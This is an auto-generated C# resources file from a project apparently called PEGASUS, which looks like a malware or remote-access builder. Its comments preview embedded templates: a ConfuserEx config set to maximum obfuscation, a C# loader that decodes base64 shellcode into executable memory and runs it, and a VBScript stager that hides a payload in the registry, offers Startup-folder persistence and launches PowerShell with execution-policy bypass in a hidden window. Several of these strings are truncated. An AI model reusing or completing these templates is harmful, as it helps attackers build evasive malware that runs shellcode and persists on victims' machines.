//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace PEGASUS.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    public class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        public static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("PEGASUS.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        public static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        public static System.Drawing.Bitmap Close_50px {
            get {
                object obj = ResourceManager.GetObject("Close_50px", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &lt;project outputDir=&quot;%path%&quot; baseDir=&quot;%path%&quot; xmlns=&quot;http://confuser.codeplex.com&quot;&gt;
        ///  &lt;rule pattern=&quot;true&quot; preset=&quot;maximum&quot; /&gt;
        ///  &lt;module path=&quot;%stub%&quot;&gt;
        ///    &lt;rule pattern=&quot;true&quot; preset=&quot;maximum&quot; /&gt;
        ///  &lt;/module&gt;
        ///&lt;/project&gt;.
        /// </summary>
        public static string config {
            get {
                return ResourceManager.GetString("config", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] ConfuserEx {
            get {
                object obj = ResourceManager.GetObject("ConfuserEx", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] ip2region {
            get {
                object obj = ResourceManager.GetObject("ip2region", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.IO.UnmanagedMemoryStream similar to System.IO.MemoryStream.
        /// </summary>
        public static System.IO.UnmanagedMemoryStream Online {
            get {
                return ResourceManager.GetStream("Online", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.IO.UnmanagedMemoryStream similar to System.IO.MemoryStream.
        /// </summary>
        public static System.IO.UnmanagedMemoryStream Online1 {
            get {
                return ResourceManager.GetStream("Online1", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        /// </summary>
        public static System.Drawing.Icon PEGASUS {
            get {
                object obj = ResourceManager.GetObject("PEGASUS", resourceCulture);
                return ((System.Drawing.Icon)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.IO;
        ///using System.IO.Compression;
        ///using Microsoft.VisualBasic;
        ///using System.Threading;
        ///using System.Reflection;
        ///using System.Runtime.CompilerServices;
        ///using System.Runtime.InteropServices;
        ///using System.Windows.Forms;
        ///using Microsoft.Win32;
        ///using System.Diagnostics;
        ///using System.Drawing;
        ///using System.Net;
        ///using System.Text;
        ///using System.Net.NetworkInformation;
        ///using System.Net.Sockets;
        ///using Microsoft.VisualBasic.CompilerServices;
        ///using System.Collections.Generic;
        /// [rest of string was truncated]&quot;;.
        /// </summary>
        public static string RK {
            get {
                return ResourceManager.GetString("RK", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Collections.Generic;
        ///using System.ComponentModel;
        ///using System.Linq;
        ///using System.Runtime.InteropServices;
        ///using System.Text;
        ///
        ///namespace Shellcode
        ///{
        ///    class Program
        ///    {
        ///        static void Main(string[] args)
        ///        {
        ///            byte[] buf = Convert.FromBase64String(&quot;%PEGASUSshell%&quot;);
        ///
        ///
        ///            IntPtr shellcode = NativeCaller.AllocateExecutableCode(IntPtr.Zero, buf);
        ///
        ///            NativeCaller.Call(shellcode);
        ///        }
        ///    }
        ///    internal static class [rest of string was truncated]&quot;;.
        /// </summary>
        public static string ShellcodeLoader {
            get {
                return ResourceManager.GetString("ShellcodeLoader", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] tsimpouki {
            get {
                object obj = ResourceManager.GetObject("tsimpouki", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to On Error Resume Next
        ///For x = 0 To #sleep
        ///     WScript.Sleep(1000)
        ///   Next
        ///
        ///B64 = &quot;#base64&quot;
        ///
        ///Set obj = CreateObject(&quot;Wscript.Shell&quot;)
        ///Set fso=CreateObject(&quot;Scripting.FileSystemObject&quot;)
        ///
        ///&apos;#startup  startPath = obj.SpecialFolders(&quot;Startup&quot;) &amp; &quot;\PEGASUS.vbs&quot;
        ///&apos;#startup  currentPath = fso.GetAbsolutePathName(wscript.scriptfullname)
        ///Reg = &quot;HKCU\SOFTWARE\PEGASUS\PEGASUS&quot;
        ///
        ///if obj.RegRead(Reg) &lt;&gt; B64 then
        ///obj.RegWrite Reg, B64
        ///end if
        ///
        ///PS1 = &quot;powershell -noexit -exec bypass -window 1 -Command #startup [rest of string was truncated]&quot;;.
        /// </summary>
        public static string vbs {
            get {
                return ResourceManager.GetString("vbs", resourceCulture);
            }
        }
    }
}
